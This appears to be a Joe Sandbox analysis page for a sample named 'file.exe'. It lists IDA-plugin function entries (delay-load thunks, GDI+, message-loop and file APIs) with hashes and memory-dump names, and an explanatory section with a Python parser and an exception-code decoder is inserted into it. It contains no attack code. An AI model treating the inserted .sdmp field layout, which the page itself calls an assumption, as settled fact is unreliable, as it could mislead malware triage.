                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2211380416-0
                                                                                                                    • Opcode ID: c5ea0daaa4ce30746ea06230f3d65e8a7c06f487716d4a391b03015d16f66212
                                                                                                                    • Instruction ID: 279ded5ea5e4795d0caa4f5bb17985363d2cba7facbbf6b4d33202e720e69167
                                                                                                                    • Opcode Fuzzy Hash: c5ea0daaa4ce30746ea06230f3d65e8a7c06f487716d4a391b03015d16f66212
                                                                                                                    • Instruction Fuzzy Hash: 4CD01211A011546ADE11B339785A7FE2E868FC6315F0D74A5F149771D2CA6848CAA261
                                                                                                                    APIs
                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00E4A62C
                                                                                                                      • Part of subcall function 00E4A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E4A3DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1915507550-0
                                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction ID: fcfa118451fabd4bafc22f7157b8f30fa063b3cd6bf64455f0bdc57aaa96e8c2
                                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction Fuzzy Hash: 27D0A77024020876DF016F22AC0297E75D5EB00354F089035B841E5142EAB1D9109256
                                                                                                                    APIs
                                                                                                                    • DloadProtectSection.DELAYIMP ref: 00E4E5E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: DloadProtectSection
• String ID:
• API String ID: 2203082970-0
• Opcode ID: 35ea1487a740c932b02d63bcb45b54eade99eebecc3ad69ade4a9bb1f6b08322
• Instruction ID: 35a39d6a6df82e45007cce6cfbc3fa816e088cb5e491a4fea68462e66ae28909
• Opcode Fuzzy Hash: 35ea1487a740c932b02d63bcb45b54eade99eebecc3ad69ade4a9bb1f6b08322
• Instruction Fuzzy Hash: A6D012B07C42419FDB09EBADB8467597394B324759F952183F145F1791DBA84884C605
APIs
• SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00E41B3E), ref: 00E4DD92
  • Part of subcall function 00E4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E4B579
  • Part of subcall function 00E4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4B58A
  • Part of subcall function 00E4B568: IsDialogMessageW.USER32(0001047E,?), ref: 00E4B59E
  • Part of subcall function 00E4B568: TranslateMessage.USER32(?), ref: 00E4B5AC
  • Part of subcall function 00E4B568: DispatchMessageW.USER32(?), ref: 00E4B5B6
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: Message$DialogDispatchItemPeekSendTranslate
• String ID:
• API String ID: 897784432-0
• Opcode ID: c54d83b49c1f18e32f61eec11698e6ea450612a2fc0ebc2e57125e7fe38b06c8
• Instruction ID: 9da8ef14749fcada0b945a108e6a0b0dc30dc6a26e95177a8dec1f3121158543
• Opcode Fuzzy Hash: c54d83b49c1f18e32f61eec11698e6ea450612a2fc0ebc2e57125e7fe38b06c8
• Instruction Fuzzy Hash: CCD09E31144300BED6016B52DE06F0A7AE6AB98B08F004956B388740F286B29D61EB15
APIs
• GetFileType.KERNELBASE(000000FF,00E397BE), ref: 00E398C8
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: c120462ca46a6cf977d004baf4769a23747f579b07e7977176858ba8054c4f0d
• Instruction ID: b18a7f425966b496a8ce79acb2fbffaf17753b26d5574194573cdae43e865818
• Opcode Fuzzy Hash: c120462ca46a6cf977d004baf4769a23747f579b07e7977176858ba8054c4f0d
• Instruction Fuzzy Hash: 50C00234404205958E655635984D095BB51AB933A9BB4A694D069950B2C362CC5BEF11
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 36060c1292028eb38d1e24a494cb7371b3d40df3f7ef5ec8cd32b31800afa7a4
• Instruction ID: e1c80145708abe9c1f50d0703cd34c6f058d77c86902f2f4b5cd7b4962ceff48
• Opcode Fuzzy Hash: 36060c1292028eb38d1e24a494cb7371b3d40df3f7ef5ec8cd32b31800afa7a4
• Instruction Fuzzy Hash: 63B092A5298100AC2508A5157902C3A0248D0C4B10330B12AB805F1280D84048040532
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 3950bf7e189be96273f279795e2ac5b9bb88a5dad9274e56569829419958040c
• Instruction ID: f49ceef2bb3678ac328768acc2a2ebf379329734a1ae728d9aa1274f5149156a
• Opcode Fuzzy Hash: 3950bf7e189be96273f279795e2ac5b9bb88a5dad9274e56569829419958040c
• Instruction Fuzzy Hash: 2FB092A5298100BC2508A5147906C3A0248D0C4F10330B02AB805F1280E8404E000532
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 5096aca86dd80cf25ccbe836c45718e9de415f2176103587e07c7b1f21aadc29
• Instruction ID: 2ffd49e22494494c44e493880eb97230f5eb1fbf450dd1ade7b6ffd54738e741
• Opcode Fuzzy Hash: 5096aca86dd80cf25ccbe836c45718e9de415f2176103587e07c7b1f21aadc29
• Instruction Fuzzy Hash: 7EB092A1298100AC2508A5157A02C7B0248D0C4B10330B12AB505F1280984008090532
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 708c57f5f5b2b99125024bae49622a6b51208157499f19d67cde13dcecf11ea5
• Instruction ID: c0f69ec1f1118ba3c55f99038bc40cb3e5713f7de37bfe92ce90c28966de6943
• Opcode Fuzzy Hash: 708c57f5f5b2b99125024bae49622a6b51208157499f19d67cde13dcecf11ea5
• Instruction Fuzzy Hash: FDA011E22A8202BC300CBA00BE02C3B020CE0C0F20330B02EF822B0280AC8008000832
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 628627d10c84e061dcaa604d6698684b37361a377644076b9016745837c96aca
• Instruction ID: 3dc8ee5f58b6795a9ee25afc859d2e333cf8718fb192510014779ab8eaa1a5c2
• Opcode Fuzzy Hash: 628627d10c84e061dcaa604d6698684b37361a377644076b9016745837c96aca
• Instruction Fuzzy Hash: D4A001E62A9252BC350DBA51BE06C7B025DE4C9FA1334B92EF856B5681A88018451976
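The delay-load entries above all list the same APIs and the same subcall at 00E4E85D: they are separate delay-import thunks in file.exe that funnel into one CRT helper. The exception code C06D0057 they pass to RaiseException is VcppException(ERROR_SEVERITY_ERROR, ERROR_INVALID_PARAMETER) from delayimp.h (facility 0x6D, Win32 error 87), i.e. the helper's own descriptor sanity check, not a failed DLL load, which would carry ERROR_MOD_NOT_FOUND (126) or ERROR_PROC_NOT_FOUND (127). Triaging this report means separating such stock runtime code from the sample's real behaviour, and the Memory Dump Source lines give the module layout to do that against. The Python below is an added example written for this page, not Joe Sandbox or IDA plugin code: it parses the dump-source names of an entry into a sorted region list and decodes the RaiseException code. The .sdmp field positions used (fourth field base address, fifth page protection, seventh allocation type) are inferred from the names in this report and are an assumption; the PAGE_* and MEM_* values are the documented winnt.h constants, and the excerpt embedded below is copied from the entry above.

```python
"""Added helper for reading this Joe Sandbox entry (not Joe Sandbox code).

Assumption, inferred from this report only: in a dump name such as
00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp
the fourth dot-separated field is the region base address, the fifth its
page protection and the seventh its allocation type, both as winnt.h
PAGE_* / MEM_* constants in hex. Other fields are left undecoded.
"""
import re

# Page-protection constants (winnt.h). The low byte is the base protection;
# modifiers such as PAGE_GUARD (0x100) are OR'ed above it.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
# Allocation-type constants (winnt.h).
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Eight dot-separated hex fields followed by ".sdmp".
SDMP_RE = re.compile(r"\b([0-9A-Fa-f]+(?:\.[0-9A-Fa-f]+){7})\.sdmp\b")
RAISE_RE = re.compile(r"RaiseException\.KERNEL32\(([0-9A-Fa-f]{8})")

# Excerpt copied from the entry above (one Source File line, its Associated
# dumps, and the RaiseException subcall).
REPORT_EXCERPT = """\
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
APIs
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
"""


def parse_sdmp_name(name):
    """Decode one dump name into base address, protection and allocation type."""
    fields = name.split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected .sdmp name layout: {name}")
    protect = int(fields[4], 16)      # assumption: fifth field = page protection
    mem_type = int(fields[6], 16)     # assumption: seventh field = allocation type
    base_protect = protect & 0xFF
    return {
        "base": int(fields[3], 16),   # assumption: fourth field = region base
        "protect": PAGE_PROTECT.get(base_protect, f"0x{protect:X}"),
        "executable": base_protect in EXECUTABLE,
        "type": MEM_TYPE.get(mem_type, f"0x{mem_type:X}"),
    }


def memory_map(report_text):
    """Distinct dumped regions named in the text, sorted by base address."""
    regions = {}
    for name in SDMP_RE.findall(report_text):
        region = parse_sdmp_name(name)
        regions.setdefault(region["base"], region)
    return [regions[base] for base in sorted(regions)]


# delayimp.h: VcppException(sev, err) == sev | (FACILITY_VISUALCPP << 16) | err
FACILITY_VISUALCPP = 0x6D
SEVERITY = {0: "ERROR_SEVERITY_SUCCESS", 1: "ERROR_SEVERITY_INFORMATIONAL",
            2: "ERROR_SEVERITY_WARNING", 3: "ERROR_SEVERITY_ERROR"}
WIN32_ERROR = {87: "ERROR_INVALID_PARAMETER", 126: "ERROR_MOD_NOT_FOUND",
               127: "ERROR_PROC_NOT_FOUND"}


def decode_vcpp_exception(code):
    """Split an NTSTATUS-layout code into severity, facility and Win32 error."""
    facility = (code >> 16) & 0x0FFF
    error = code & 0xFFFF
    return {
        "severity": SEVERITY[code >> 30],
        "facility": "FACILITY_VISUALCPP" if facility == FACILITY_VISUALCPP else f"0x{facility:X}",
        "error": error,
        "error_name": WIN32_ERROR.get(error, "unknown"),
    }


def raise_exception_codes(report_text):
    """Every exception code passed to RaiseException in the entry text."""
    return [int(c, 16) for c in RAISE_RE.findall(report_text)]


if __name__ == "__main__":
    for r in memory_map(REPORT_EXCERPT):
        print(f"{r['base']:08X}  {r['protect']:<22} {r['type']}  exec={r['executable']}")
    for code in raise_exception_codes(REPORT_EXCERPT):
        print(f"{code:08X} -> {decode_vcpp_exception(code)}")
```

Run against the excerpt, the layout comes out as a single MEM_IMAGE module at 00E30000: read-only headers, one execute-read region at 00E31000 (where every function in this section lives), read-only data at 00E63000 and 00E93000, and read-write data from 00E6E000. Any later entry whose Source File decodes to a private, writable region outside that range would be worth a closer look than these CRT thunks.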
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: b14c74acc882ea65df65f73076db0500d6e8407ce6746129ff31ac8cc4cf753f
• Instruction ID: 3dc8ee5f58b6795a9ee25afc859d2e333cf8718fb192510014779ab8eaa1a5c2
• Opcode Fuzzy Hash: b14c74acc882ea65df65f73076db0500d6e8407ce6746129ff31ac8cc4cf753f
                                                                                                                    • Instruction Fuzzy Hash: D4A001E62A9252BC350DBA51BE06C7B025DE4C9FA1334B92EF856B5681A88018451976
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: e6c09c51c2a9d696effc9d054f5df1bb17fc0f832447fbf2fd0cd7caacd65b0c
• Instruction ID: 3dc8ee5f58b6795a9ee25afc859d2e333cf8718fb192510014779ab8eaa1a5c2
• Opcode Fuzzy Hash: e6c09c51c2a9d696effc9d054f5df1bb17fc0f832447fbf2fd0cd7caacd65b0c
• Instruction Fuzzy Hash: D4A001E62A9252BC350DBA51BE06C7B025DE4C9FA1334B92EF856B5681A88018451976
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 791c033120ed820aa58fe12fcd587b9a8b17a6e3d19844a8aa718c68092bb588
• Instruction ID: 3dc8ee5f58b6795a9ee25afc859d2e333cf8718fb192510014779ab8eaa1a5c2
• Opcode Fuzzy Hash: 791c033120ed820aa58fe12fcd587b9a8b17a6e3d19844a8aa718c68092bb588
• Instruction Fuzzy Hash: D4A001E62A9252BC350DBA51BE06C7B025DE4C9FA1334B92EF856B5681A88018451976
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: dcb85cde3269f1e137abff0ed71d1f50a94e8168576ad7d3d4f6fa3973efeb6c
• Instruction ID: 3dc8ee5f58b6795a9ee25afc859d2e333cf8718fb192510014779ab8eaa1a5c2
• Opcode Fuzzy Hash: dcb85cde3269f1e137abff0ed71d1f50a94e8168576ad7d3d4f6fa3973efeb6c
• Instruction Fuzzy Hash: D4A001E62A9252BC350DBA51BE06C7B025DE4C9FA1334B92EF856B5681A88018451976
APIs
• SetEndOfFile.KERNELBASE(?,00E3903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00E39F0C
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: File
• String ID:
• API String ID: 749574446-0
• Opcode ID: dabb2af15662d10db9be693ef807814dd076830720e325bd691a1a254c844d80
• Instruction ID: 2cb2c6878e3e1886ec52647c6b7789a22a3aafb0a089b1caf8be7ef63dda3319
• Opcode Fuzzy Hash: dabb2af15662d10db9be693ef807814dd076830720e325bd691a1a254c844d80
